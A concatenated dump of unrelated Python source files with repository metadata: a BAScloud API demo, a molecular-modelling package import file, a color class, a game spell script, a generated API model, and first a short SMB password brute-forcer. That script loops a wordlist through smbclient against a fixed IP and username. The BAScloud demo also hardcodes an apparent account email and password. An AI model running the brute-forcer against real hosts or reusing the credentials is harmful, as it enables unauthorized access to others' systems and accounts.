] | null | null | null | bf_smb_tmux.py | BadNameException/SambaBF | 7421ac1d821807ffc565b7b5b466c85084343fb9 | [
"MIT"
] | null | null | null | bf_smb_tmux.py | BadNameException/SambaBF | 7421ac1d821807ffc565b7b5b466c85084343fb9 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding=utf-8
from subprocess import Popen, PIPE, check_output
p = 1
USERNAME = "sigurdkb"
IP = "172.16.0.30"
PORT = "445"
new_results = []
correct_pw = ""
cracked = bool(False)
counter = 0
guess_result = ((),)
pw = ''
def connect_smb():
global correct_pw
global cracked
global guess_result
global pw
while cracked == False:
pw = get_next_pw()
arg = 'smbclient //'+IP+'/homes -U '+USERNAME+' '+pw
proc = Popen('/bin/bash', stdin=PIPE, stdout=PIPE)
stdout = proc.communicate(arg.encode())
guess_result = stdout
print ("Try: " + pw )
if b'Welcome' in guess_result:
print ("Correct password: " + pw)
correct_pw = pw
f = open("correct_pw.txt", 'w')
f.write(correct_pw)
cracked = True
else:
print ("Tried: " + pw)
def get_next_pw():
global counter
global filenr
f = open("wl.txt", 'r')
l = f.readlines()[counter]
if l == '':
print ("wordlist_part"+ str(filenr) + " er ferdig")
exit(0)
else:
l = 'f'+l
counter += 1
return l.strip('\n')
connect_smb()
| 17.931034 | 54 | 0.626923 | 152 | 1,040 | 4.171053 | 0.532895 | 0.070978 | 0.050473 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019417 | 0.207692 | 1,040 | 57 | 55 | 18.245614 | 0.75 | 0.031731 | 0 | 0.045455 | 0 | 0 | 0.138308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.022727 | 0.022727 | null | null | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
381c5c0ab457121c1be3d4dc192a40949d85e8c1 | 1,378 | py | Python | isdbeads/__init__.py | michaelhabeck/bayesian-random-tomography | 9429a3688df368f0fe8fd7beaa8202386951164a | [
"MIT"
] | 2 | 2021-04-17T14:05:05.000Z | 2022-02-24T16:03:29.000Z | isdbeads/__init__.py | michaelhabeck/bayesian-random-tomography | 9429a3688df368f0fe8fd7beaa8202386951164a | [
"MIT"
] | null | null | null | isdbeads/__init__.py | michaelhabeck/bayesian-random-tomography | 9429a3688df368f0fe8fd7beaa8202386951164a | [
"MIT"
] | null | null | null | from .universe import (
Universe,
Particle
)
from .probability import (
Probability
)
from .likelihood import (
Likelihood,
Normal,
Exponential,
LowerUpper,
Logistic,
GaussianMixture,
Relu
)
from .model import (
ModelDistances,
ModelImage,
ModelVolume,
RadiusOfGyration,
ProjectedCloud,
ModelFactory
)
from .grid import (
Grid
)
from .params import (
Volume,
Image,
Parameters,
Forces,
Location,
Precision,
Scale,
Coordinates,
Distances,
Rotation
)
from .prior import (
BoltzmannEnsemble,
TsallisEnsemble
)
from .forcefield import (
ForcefieldFactory
)
from .nblist import (
NBList
)
from .posterior import (
ConditionalPosterior,
PosteriorCoordinates
)
from .data import (
HiCData,
HiCParser
)
from .mcmc import (
RandomWalk,
AdaptiveWalk,
Ensemble
)
from .hmc import (
HamiltonianMonteCarlo
)
from .rex import (
ReplicaExchange,
ReplicaHistory,
ReplicaState
)
from .core import (
take_time
)
from .utils import (
rdf,
crosscorr,
image_center,
ChainViewer,
create_universe,
random_sphere,
segment_structure
)
from .chromosome import (
ChromosomeSimulation
)
from .inference import (
AdaptiveWalk,
RotationSampler,
HamiltonianMonteCarlo
)
| 12.759259 | 26 | 0.656749 | 113 | 1,378 | 7.964602 | 0.619469 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.277939 | 1,378 | 107 | 27 | 12.878505 | 0.904523 | 0 | 0 | 0.044444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3820fe50d4dce95d717e614296b340c0f9ebd66c | 1,294 | py | Python | gui/Color.py | brianjimenez/emol | b789b85b40a99247f008fb7cafa0d019d142cd3c | [
"MIT"
] | null | null | null | gui/Color.py | brianjimenez/emol | b789b85b40a99247f008fb7cafa0d019d142cd3c | [
"MIT"
] | null | null | null | gui/Color.py | brianjimenez/emol | b789b85b40a99247f008fb7cafa0d019d142cd3c | [
"MIT"
] | null | null | null | '''
Created on Oct 10, 2012
@author: Brian Jimenez-Garcia
@contact: brian.jimenez@bsc.es
'''
class Color:
def __init__(self, red=0., green=0., blue=0., alpha=1.0):
self.__red = red
self.__green = green
self.__blue = blue
self.__alpha = alpha
def get_rgba(self):
return self.__red, self.__green, self.__blue, self.__alpha
def get_red(self):
return self.__red
def get_blue(self):
return self.__blue
def get_green(self):
return self.__green
def get_alpha(self):
return self.__alpha
# Useful predefined colors
White = Color(1.0, 1.0, 1.0, 1.0)
Black = Color(0.0, 0.0, 0.0, 1.0)
Carbon = Color(0.17, 0.17, 0.18, 1.0)
Red = Color(0.95, 0.03, 0.01, 1.0)
Blue = Color(0.01, 0.03, 0.95, 1.0)
Sky = Color(0.233, 0.686, 1.0, 1.0)
Yellow = Color(1.0, 1.0, 0.0, 1.0)
Green = Color(0.0, 0.53, 0.0, 1.0)
Pink = Color(0.53, 0.12, 0.36, 1.0)
DarkRed = Color(0.59, 0.13, 0.0, 1.0)
Violet = Color(0.46, 0.0, 1.0, 1.0)
DarkViolet = Color(0.39, 0.0, 0.73, 1.0)
Cyan = Color(0.0, 1.0, 1.0, 1.0)
Orange = Color(1.0, 0.59, 0.0, 1.0)
Peach = Color(1.0, 0.66, 0.46, 1.0)
DarkGreen = Color(0.0, 0.46, 0.0, 1.0)
Gray = Color(0.59, 0.59, 0.59, 1.0)
DarkOrange = Color(0.86, 0.46, 0.0, 1.0) | 26.408163 | 66 | 0.578053 | 264 | 1,294 | 2.708333 | 0.231061 | 0.083916 | 0.071329 | 0.05035 | 0.090909 | 0.054545 | 0.01958 | 0 | 0 | 0 | 0 | 0.187123 | 0.231839 | 1,294 | 49 | 67 | 26.408163 | 0.532193 | 0.085781 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.176471 | false | 0 | 0 | 0.147059 | 0.352941 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
382269a9358bb58a18f501c0bd286c171e8ac7d7 | 775 | py | Python | Spell Compendium/scr/Spell1148 - Nimbus of Light.py | Sagenlicht/ToEE_Mods | a4b07f300df6067f834e09fcbc4c788f1f4e417b | [
"MIT"
] | 1 | 2021-04-26T08:03:56.000Z | 2021-04-26T08:03:56.000Z | Spell Compendium/scr/Spell1148 - Nimbus of Light.py | Sagenlicht/ToEE_Mods | a4b07f300df6067f834e09fcbc4c788f1f4e417b | [
"MIT"
] | 2 | 2021-06-11T05:55:01.000Z | 2021-08-03T23:41:02.000Z | Spell Compendium/scr/Spell1148 - Nimbus of Light.py | Sagenlicht/ToEE_Mods | a4b07f300df6067f834e09fcbc4c788f1f4e417b | [
"MIT"
] | 1 | 2021-05-17T15:37:58.000Z | 2021-05-17T15:37:58.000Z | from toee import *
def OnBeginSpellCast(spell):
print "Nimbus of Light OnBeginSpellCast"
print "spell.target_list=", spell.target_list
print "spell.caster=", spell.caster, " caster.level= ", spell.caster_level
def OnSpellEffect(spell):
print "Nimbus of Light OnSpellEffect"
spell.duration = 10 * spell.caster_level
spellTarget = spell.target_list[0]
spellTarget.obj.condition_add_with_args('sp-Nimbus of Light', spell.id, spell.duration, 0, 0) #3rd arg = roundsCharged; 4th arg = attack_hit_status
spellTarget.partsys_id = game.particles('sp-Heroism', spellTarget.obj)
spell.spell_end(spell.id)
def OnBeginRound(spell):
print "Nimbus of Light OnBeginRound"
def OnEndSpellCast(spell):
print "Nimbus of Light OnEndSpellCast"
| 31 | 151 | 0.740645 | 101 | 775 | 5.564356 | 0.39604 | 0.071174 | 0.115658 | 0.128114 | 0.163701 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01072 | 0.157419 | 775 | 24 | 152 | 32.291667 | 0.849923 | 0.067097 | 0 | 0 | 0 | 0 | 0.267684 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.0625 | null | null | 0.375 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
38229cdc49513c553f97ed67ce3eaa6b0ba92dcb | 17,258 | py | Python | pyBAScloudAPI/examples/main.py | bascloud/BASCloudAPI | 6a06d430720e99204f84f5362b4f22d7d4a72b76 | [
"MIT"
] | 3 | 2021-04-30T07:44:11.000Z | 2021-05-03T06:35:01.000Z | pyBAScloudAPI/examples/main.py | bascloud/BASCloudAPI | 6a06d430720e99204f84f5362b4f22d7d4a72b76 | [
"MIT"
] | 9 | 2021-06-23T04:21:51.000Z | 2022-01-17T04:15:06.000Z | pyBAScloudAPI/examples/main.py | bascloud/BAScloudAPI | 6a06d430720e99204f84f5362b4f22d7d4a72b76 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import datetime
import pyBAScloudAPI as api
def printErrorHandler(exception, json):
print("\t\tException occured in request: ", exception, json)
print("Testing util functions.")
print("\t2021-04-26T10:56:58.000Z = ", api.Util.parseDateTimeString(dateTime="2021-04-26T10:56:58.000Z"))
assert api.Util.parseDateTimeString(dateTime="2021-04-26T10:56:58.000Z") == 1619427418
print("\tParameters:", api.Util.parseURLParameter(url="test.local/tenants/XXX/connectors/XXX/devices?page[size]=1&page[before]=Mzk5ZTM1MWYtNTI3OS00YzFhLTk0MmUtYTZiODBmMjFiYzVh"))
print("Demo of library methods for BAScloud API endpoints.")
print("Initialising library...")
BCAPI = api.EntityContext("https://basc-prd-apm-euw.azure-api.net/v2")
print("\tOK.")
print("1. - Authentication with user login")
BCAPI.authenticateWithUserLogin(email="erhardt@profm-gmbh.de", password="Dont4get$1")
print("\tOK.")
print("\tAuthenticated: ", BCAPI.isAuthenticated())
print("\tToken valid until: ", datetime.datetime.fromtimestamp(BCAPI.getTokenExpirationDate()))
print("\tToken: ", BCAPI.getToken())
print("2. - Access user information")
print("\tRequesting all users...")
users = BCAPI.getUsersCollection(errorHandler=printErrorHandler)
print("\t\tOK.")
print("\tFound users: ", len(users[0]))
print("\tRequesting single users with UUID...")
currentUser = BCAPI.getUser(users[0][0].uuid)
print("\t\tOK.")
print("\tUser UUID: ", currentUser.uuid)
print("\tUser Email: ", currentUser.email)
print("\tUser created at: ", datetime.datetime.fromtimestamp(currentUser.createdAt))
print("\tUser updated at: ", datetime.datetime.fromtimestamp(currentUser.updatedAt))
print("\tRequesting associated tenant...")
assoc_tenant = BCAPI.getAssociatedTenant(currentUser.uuid)
print("\t\tOK.")
print("\tTenant UUID: ", assoc_tenant.uuid)
print("3. - Access tenant information")
print("\tRequesting all tenants...")
tenants = BCAPI.getTenantsCollection()
print("\t\tOK.")
print("\tFound tenants: ", len(tenants[0]))
print("\tRequesting single tenant with UUID...")
tenant = BCAPI.getTenant(tenants[0][0].uuid)
print("\t\tOK.")
print("\tTenant UUID: ", tenant.uuid)
print("\tTenant Name: ", tenant.name)
print("\tTenant URL Name: ", tenant.urlName)
print("\tTenant created at: ", datetime.datetime.fromtimestamp(tenant.createdAt))
print("\tTenant updated at: ", datetime.datetime.fromtimestamp(tenant.updatedAt))
print("\tRequesting associated users of tenant...")
tenant_user = BCAPI.getAssociatedUsers(tenant.uuid)
print("\t\tOK.")
print("\tFound tenant users: ", len(tenant_user[0]))
# print("3.5 - Create tenant and update")
# print("\tCreating new tenant...")
# new_tenant = BCAPI.createTenant("MoritzTestTenant", currentUser.uuid);
# print("\t\tOK.")
# print("\tNew tenant UUID: ", new_tenant.uuid)
# print("\tRequesting newly created tenant with UUID...")
# new_re_tenant = BCAPI.getTenant(new_tenant.uuid);
# print("\t\tOK.")
# print("\tTenant UUID: ", new_re_tenant.uuid)
# print("\tTenant Name: ", new_re_tenant.name)
# print("\tTenant URL Name: ", new_re_tenant.urlName)
# print("\tTenant created at: ", datetime.datetime.fromtimestamp(new_re_tenant.createdAt))
# print("\tTenant updated at: ", datetime.datetime.fromtimestamp(new_re_tenant.createdAt))
# print("\tUpdating newly created tenant...")
# up_re_tenant = BCAPI.updateTenant(new_re_tenant.uuid, "MoritzTestTenant2")
# print("\t\tOK.")
# print("\tTenant Name: ", up_re_tenant.getName())
# print("\tRequesting associated users of tenant...")
# re_tenant_user = BCAPI.getAssociatedUsers(new_re_tenant.uuid)
# print("\t\tOK.")
# print("\tFound tenant users: ", len(re_tenant_user[0]))
# print("\tDeleting newly created tenant...")
# BCAPI.deleteTenant(new_re_tenant.uuid)
# print("\t\tOK.")
print("4. - Access property information")
print("\tRequesting all properties...")
props = BCAPI.getPropertiesCollection(tenant.uuid)
print("\t\tOK.")
print("\tFound properties: ", len(props[0]))
print("\tRequesting single property with UUID...")
print("\tProperty UUID: ", props[0][0].uuid)
property = BCAPI.getProperty(tenant.uuid, props[0][0].uuid)
print("\t\tOK.")
print("\tProperty UUID: ", property.uuid)
print("\tProperty Name: ", property.name)
print("\tProperty Address: {}, {} {}, {}".format(property.street, property.postalCode, property.city, property.country))
print("\tProperty created at: ", datetime.datetime.fromtimestamp(property.createdAt))
print("\tProperty updated at: ", datetime.datetime.fromtimestamp(property.updatedAt))
print("\tRequesting associated connectors of the property...")
prop_connectors = BCAPI.getAssociatedConnectors(tenant.uuid, property.uuid)
print("\t\tOK.")
print("\tFound property connectors: ", len(prop_connectors[0]))
print("4.5 - Create property and update")
print("\tCreating new property...")
new_property = BCAPI.createProperty(tenant.uuid, "MoritzTestProperty", "Street", "12345", "City", "Country")
print("\t\tOK.")
print("\tNew property UUID: ", new_property.uuid)
print("\tRequesting newly created property with UUID...")
new_re_property = BCAPI.getProperty(tenant.uuid,new_property.uuid)
print("\t\tOK.")
print("\tProperty UUID: ", new_re_property.uuid)
print("\tProperty Name: ", new_re_property.name)
print("\tProperty Address: {}, {} {}, {}".format(new_re_property.street, new_re_property.postalCode, new_re_property.city, new_re_property.country))
print("\tProperty created at: ", datetime.datetime.fromtimestamp(new_re_property.createdAt))
print("\tProperty updated at: ", datetime.datetime.fromtimestamp(new_re_property.updatedAt))
print("\tUpdating newly created property...")
up_re_property = BCAPI.updateProperty(tenant.uuid, new_re_property.uuid, "MoritzTestProperty2");
print("\t\tOK.")
print("\tProperty Name: ", up_re_property.name)
# Should be always be empty see next section create new connector for it
print("\tRequesting associated connectors of the property...")
new_prop_connectors = BCAPI.getAssociatedConnectors(tenant.uuid, up_re_property.uuid)
print("\t\tOK.")
print("\tFound property connectors: ", len(new_prop_connectors[0]))
# print("\tDeleting newly created property...")
# BCAPI.deleteProperty(tenant.uuid, up_re_property.uuid)
# print("\t\tOK.")
print("5. - Access connector information")
print("\tRequesting all connectors...")
connectors = BCAPI.getConnectorsCollection(tenant.uuid)
print("\t\tOK.")
print("\tFound connectors: ", len(connectors[0]))
print("\tRequesting single connector with UUID...")
print("\tConnector UUID: ", connectors[0][0].uuid)
connector = BCAPI.getConnector(tenant.uuid, connectors[0][0].uuid)
print("\t\tOK.")
print("\tConnector UUID: ", connector.uuid)
print("\tConnector Name: ", connector.name)
print("\tConnector created at: ", datetime.datetime.fromtimestamp(connector.createdAt))
print("\tConnector updated at: ", datetime.datetime.fromtimestamp(connector.updatedAt))
print("\tRequesting associated property of the connector again...")
conn_prop = BCAPI.getAssociatedProperty(tenant.uuid, connector.uuid)
print("\t\tOK.")
print("\tConnector's property UUID: ", conn_prop.uuid)
print("\tRequest connector's associated devices...")
max_devices = 0
for conn in connectors[0]:
conn_devices = BCAPI.getAssociatedDevices(tenant.uuid, conn.uuid)
if len(conn_devices[0]) > max_devices:
max_devices = len(conn_devices[0])
connector = conn
print("\t\tFound connector with ", len(conn_devices[0]), " devices")
print("5.5 - Create connector and update")
print("\tCreating new connector...")
new_connector = BCAPI.createConnector(tenant.uuid, new_property.uuid, "MoritzTestConnector")
print("\t\tOK.")
print("\tNew connector UUID: ", new_connector.uuid)
print("\tRequesting new API key for created connector...")
connectorToken = BCAPI.getNewConnectorAuthToken(tenant.uuid, new_connector.uuid)
print("\t\tOK.")
print("\tConnector Auth. Token: ", connectorToken)
print("\tRequesting newly created connector with UUID...")
new_re_connector = BCAPI.getConnector(tenant.uuid, new_connector.uuid)
print("\t\tOK.")
print("\tConnector UUID: ", new_re_connector.uuid)
print("\tConnector Name: ", new_re_connector.name)
print("\tConnector created at: ", datetime.datetime.fromtimestamp(new_re_connector.createdAt))
print("\tConnector updated at: ", datetime.datetime.fromtimestamp(new_re_connector.createdAt))
print("\tUpdating newly created connector...")
up_re_connector = BCAPI.updateConnector(tenant.uuid, new_re_connector.uuid, "MoritzTestConnector2");
print("\t\tOK.")
print("\tConnector Name: ", up_re_connector.name)
print("\tRequesting associated connectors of the new property...")
new_prop_connectors = BCAPI.getAssociatedConnectors(tenant.uuid, new_property.uuid);
print("\t\tOK.")
print("\tFound property connectors: ", len(new_prop_connectors[0]))
# print("\tDeleting newly created connector...")
# BCAPI.deleteConnector(tenant.uuid, new_connector.uuid);
# print("\t\tOK.")
# print("\tDeleting newly created property...")
# BCAPI.deleteProperty(tenant.uuid, new_property.uuid);
# print("\t\tOK.")
print("6. - Access device information")
print("\tRequesting all devices...")
devices = BCAPI.getDevicesCollection(tenant.uuid)
print("\t\tOK.")
print("\tFound devices: ", len(devices[0]))
print("\tRequesting single device with UUID...")
print("\tDevice UUID: ", devices[0][0].uuid)
device = BCAPI.getDevice(tenant.uuid, devices[0][0].uuid)
print("\t\tOK.")
print("\tDevice UUID: ", device.uuid)
print("\tDevice AKS ID: ", device.aksID)
print("\tDevice Description: ", device.description)
print("\tDevice Unit: ", device.unit)
print("\tDevice created at: ", datetime.datetime.fromtimestamp(device.createdAt))
print("\tDevice updated at: ", datetime.datetime.fromtimestamp(device.updatedAt))
print("\tRequesting associated connector of the device again...")
device_conn = BCAPI.getAssociatedConnector(tenant.uuid, device.uuid)
print("\t\tOK.")
print("\tDevice's Connector UUID: ", device_conn.uuid)
print("\tRequesting device associated readings...")
max_readings = 0
for d in devices[0]:
device_readings = BCAPI.getAssociatedReadings(tenant.uuid, d.uuid)
if len(device_readings[0]) > max_readings:
max_readings = len(device_readings[0])
device = d
print("\t\tFound device with ", len(device_readings[0]), " readings")
print("\tRequesting paginated device associated readings...")
paging = api.PagingOption(10, api.PagingOption.Direction.NONE, "")
device_readings = BCAPI.getAssociatedReadings(tenant.uuid, device.uuid, paging)
print("\t\tOK.")
print("\tFound readings: ", len(device_readings[0]))
for r in device_readings[0]:
print("\t\tReading: ", datetime.datetime.fromtimestamp(r.timestamp), " - ", r.value)
print("\tRequesting device associated setpoints...")
max_setpoints = 0
for d in devices[0]:
device_setpoint = BCAPI.getAssociatedSetPoints(tenant.uuid, d.uuid, paging)
if len(device_setpoint[0]) > max_setpoints:
max_setpoints = len(device_setpoint[0])
device = d
print("\t\tFound device with ", len(device_setpoint[0]), " setpoints")
print("\tRequesting paginated device associated setpoints...")
device_setpoint = BCAPI.getAssociatedSetPoints(tenant.uuid, device.uuid, paging)
print("\t\tOK.")
print("\tFound setpoints: ", len(device_setpoint[0]))
for sp in device_setpoint[0]:
print("\t\Setpoint: ", datetime.datetime.fromtimestamp(sp.timestamp), " - ", sp.value)
print("6.5 - Create device and update")
print("\tCreating new device...")
new_device = BCAPI.createDevice(tenant.uuid, new_connector.uuid, "MoritzTestAKS1000", "TestDevice", "m3")
print("\t\tOK.")
print("\tNew device UUID: ", new_device.uuid)
print("\tRequesting newly created device with UUID...")
new_re_device = BCAPI.getDevice(tenant.uuid, new_device.uuid)
print("\t\tOK.")
print("\tDevice UUID: ", new_re_device.uuid)
print("\tDevice AKS ID: ", new_re_device.aksID)
print("\tDevice Description: ", new_re_device.description)
print("\tDevice Unit: ", new_re_device.unit)
print("\tDevice created at: ", datetime.datetime.fromtimestamp(new_re_device.createdAt))
print("\tDevice updated at: ", datetime.datetime.fromtimestamp(new_re_device.updatedAt))
print("\tUpdating newly created device...")
up_re_device = BCAPI.updateDevice(tenant.uuid, new_re_device.uuid, "MoritzTestAKS1001");
print("\t\tOK.")
print("\tDevice AKS ID: ", up_re_device.aksID)
print("\tRequesting associated connector of the new device...")
new_dev_connector = BCAPI.getAssociatedConnector(tenant.uuid, up_re_device.uuid)
print("\t\tOK.")
print("\tFound device connector: ", new_dev_connector.uuid)
# print("\tDeleting newly created device...")
# BCAPI.deleteDevice(tenant.uuid, new_device.uuid)
# print("\t\tOK.")
print("7. - Access reading information")
print("\tRequesting all readings...")
readings = BCAPI.getReadingsCollection(tenant.uuid)
print("\t\tOK.")
print("\tFound readings: ", len(readings[0]))
if len(readings[0]) > 0:
print("\tRequesting single reading with UUID...")
print("\tReading UUID: ", readings[0][0].uuid)
reading = BCAPI.getReading(tenant.uuid, readings[0][0].uuid)
print("\t\tOK.")
print("\tReading UUID: ", reading.uuid)
print("\tReading Value: ", reading.value)
print("\tReading timestamp: ", datetime.datetime.fromtimestamp(reading.timestamp))
print("\tReading created at: " , datetime.datetime.fromtimestamp(reading.createdAt))
print("\tReading updated at: ", datetime.datetime.fromtimestamp(reading.updatedAt))
print("\tRequesting associated device of the reading again...")
read_device = BCAPI.getAssociatedDevice(tenant.uuid, reading.uuid)
print("\t\tOK.")
print("\tReadings's Device UUID: ", read_device.uuid)
print("8. - Create new reading")
currentDateTime = int(datetime.datetime.now().timestamp())
new_read = BCAPI.createReading(tenant.uuid, new_device.uuid, 1234.56, currentDateTime);
print("\t\tOK.")
print("\tRequesting created reading information again... ")
new_re_reading = BCAPI.getReading(tenant.uuid, new_read.uuid)
print("\t\tOK.")
print("\tReading UUID: ", new_re_reading.uuid)
print("\tReading Value: ", new_re_reading.value)
print("\tReading timestamp: ", datetime.datetime.fromtimestamp(new_re_reading.timestamp))
print("\tReading created at: ", datetime.datetime.fromtimestamp(new_re_reading.createdAt))
print("\tReading updated at: ", datetime.datetime.fromtimestamp(new_re_reading.updatedAt))
print("\tRequesting paginated device associated readings...")
new_device_readings = BCAPI.getAssociatedReadings(tenant.uuid, new_device.uuid, paging)
print("\t\tOK.")
print("\tFound readings: ", len(new_device_readings[0]))
for sp in new_device_readings[0]:
print("\t\tReading: ",datetime.datetime.fromtimestamp(sp.timestamp), " - ", sp.value)
print("\tRequesting deletion of created reading again... ")
BCAPI.deleteReading(tenant.uuid, new_re_reading.uuid)
print("\t\tOK.")
print("9. - Access setpoint information")
print("\tRequesting all setpoints...")
setpoints = BCAPI.getSetPointsCollection(tenant.uuid)
print("\t\tOK.")
print("\tFound setpoints: ", len(setpoints[0]))
if len(setpoints[0]) > 0:
print("\tRequesting single setpoint with UUID...")
print("\tSetPoint UUID: ", setpoints[0][0].uuid)
setpoint = BCAPI.getSetPoint(tenant.uuid, setpoints[0][0].uuid)
print("\t\tOK.")
print("\tSetPoint UUID: ", setpoint.uuid)
print("\tSetPoint Value: ", setpoint.value)
print("\tSetPoint timestamp: ", datetime.datetime.fromtimestamp(setpoint.timestamp))
print("\tSetPoint created at: ", datetime.datetime.fromtimestamp(setpoint.createdAt))
print("\tSetPoint updated at: ", datetime.datetime.fromtimestamp(setpoint.updatedAt))
print("10. - Create new setpoint")
currentDateTime = int(datetime.datetime.now().timestamp())
new_setPoint = BCAPI.createSetPoint(tenant.uuid, new_device.uuid, 2345.67, currentDateTime)
print("\t\tOK.")
print("\tRequesting created setpoint information again... ")
new_re_setpoint = BCAPI.getSetPoint(tenant.uuid, new_setPoint.uuid)
print("\t\tOK.")
print("\tSetPoint UUID: ", new_re_setpoint.uuid)
print("\tSetPoint Value: ", new_re_setpoint.value)
print("\tSetPoint timestamp: ", datetime.datetime.fromtimestamp(new_re_setpoint.timestamp))
print("\tSetPoint created at: ", datetime.datetime.fromtimestamp(new_re_setpoint.createdAt))
print("\tSetPoint updated at: ", datetime.datetime.fromtimestamp(new_re_setpoint.updatedAt))
print("\tRequesting paginated device associated setpoints...")
new_device_setpoint = BCAPI.getAssociatedSetPoints(tenant.uuid, new_device.uuid, paging)
print("\t\tOK.")
print("\tFound setpoints: ", len(new_device_setpoint[0]))
for sp in new_device_setpoint[0]:
print("\t\tSetPoint: ", datetime.datetime.fromtimestamp(sp.timestamp), " - ", sp.value)
print("12. - Deleting created entities")
# // print("\tDeleting created device...")
# // BCAPI.deleteDevice(tenant.uuid, new_device.uuid);
# // print("\t\tOK.")
print("\tDeleting created connector...")
BCAPI.deleteConnector(tenant.uuid, new_connector.uuid)
print("\t\tOK.")
print("\tDeleting created property...")
BCAPI.deleteProperty(tenant.uuid, new_property.uuid)
print("\t\tOK.") | 30.224168 | 178 | 0.735195 | 2,142 | 17,258 | 5.82493 | 0.114846 | 0.047608 | 0.038952 | 0.059469 | 0.626513 | 0.473511 | 0.382303 | 0.301835 | 0.259918 | 0.107558 | 0 | 0.012055 | 0.10117 | 17,258 | 571 | 179 | 30.224168 | 0.79229 | 0.103952 | 0 | 0.207612 | 0 | 0.00346 | 0.337029 | 0.01394 | 0 | 0 | 0 | 0 | 0.00346 | 1 | 0.00346 | false | 0.00346 | 0.00692 | 0 | 0.010381 | 0.740484 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
382e05c1aec0a1e0fafc3e75a778a936b61e0df4 | 51,977 | py | Python | mm_power_sdk_python/models/private_trial.py | MolecularMatch/mm-power-sdk-python | 1fcbcc25c47d7b435e03929cb185eb7f10fb415d | [
"Apache-2.0"
] | null | null | null | mm_power_sdk_python/models/private_trial.py | MolecularMatch/mm-power-sdk-python | 1fcbcc25c47d7b435e03929cb185eb7f10fb415d | [
"Apache-2.0"
] | null | null | null | mm_power_sdk_python/models/private_trial.py | MolecularMatch/mm-power-sdk-python | 1fcbcc25c47d7b435e03929cb185eb7f10fb415d | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
MolecularMatch MMPower
MMPower API # noqa: E501
OpenAPI spec version: 1.0.0
Contact: support@molecularmatch.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class PrivateTrial(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'str',
'institution_id': 'str',
'institution_study_id': 'str',
'registry_id': 'str',
'visible_to_idn': 'bool',
'brief_title': 'str',
'acronym': 'list[str]',
'official_title': 'str',
'sponsors': 'list[ClinicalTrialSponsors]',
'source': 'str',
'oversight': 'Oversight',
'brief_summary': 'str',
'detailed_description': 'str',
'status': 'str',
'start_date': 'datetime',
'completion_date': 'datetime',
'phase': 'str',
'study_type': 'str',
'has_expanded_access': 'bool',
'expanded_access': 'ExpandedAccess',
'study_design': 'StudyDesign',
'primary_outcome': 'list[Outcome]',
'secondary_outcome': 'list[Outcome]',
'other_outcome': 'list[Outcome]',
'number_of_arms': 'int',
'number_of_groups': 'int',
'enrollment': 'int',
'condition': 'list[str]',
'arm_group': 'list[ArmGroup]',
'intervention': 'list[Intervention]',
'biospec_retention': 'str',
'biospec_descr': 'str',
'eligibility': 'Eligibility',
'overall_official': 'list[Investigator]',
'overall_contact': 'Contact',
'overall_contact_backup': 'Contact',
'location': 'list[Location]',
'location_countries': 'list[str]',
'link': 'str',
'reference': 'list[Reference]',
'verification_date': 'datetime',
'study_first_submitted': 'datetime',
'study_first_posted': 'datetime',
'last_update_posted': 'datetime',
'keyword': 'list[str]',
'responsible_party': 'list[ResponsibleParty]',
'processing_status': 'str',
'test': 'bool'
}
attribute_map = {
'id': 'id',
'institution_id': 'institution_id',
'institution_study_id': 'institution_study_id',
'registry_id': 'registry_id',
'visible_to_idn': 'visible_to_IDN',
'brief_title': 'brief_title',
'acronym': 'acronym',
'official_title': 'official_title',
'sponsors': 'sponsors',
'source': 'source',
'oversight': 'oversight',
'brief_summary': 'brief_summary',
'detailed_description': 'detailed_description',
'status': 'status',
'start_date': 'start_date',
'completion_date': 'completion_date',
'phase': 'phase',
'study_type': 'study_type',
'has_expanded_access': 'has_expanded_access',
'expanded_access': 'expanded_access',
'study_design': 'study_design',
'primary_outcome': 'primary_outcome',
'secondary_outcome': 'secondary_outcome',
'other_outcome': 'other_outcome',
'number_of_arms': 'number_of_arms',
'number_of_groups': 'number_of_groups',
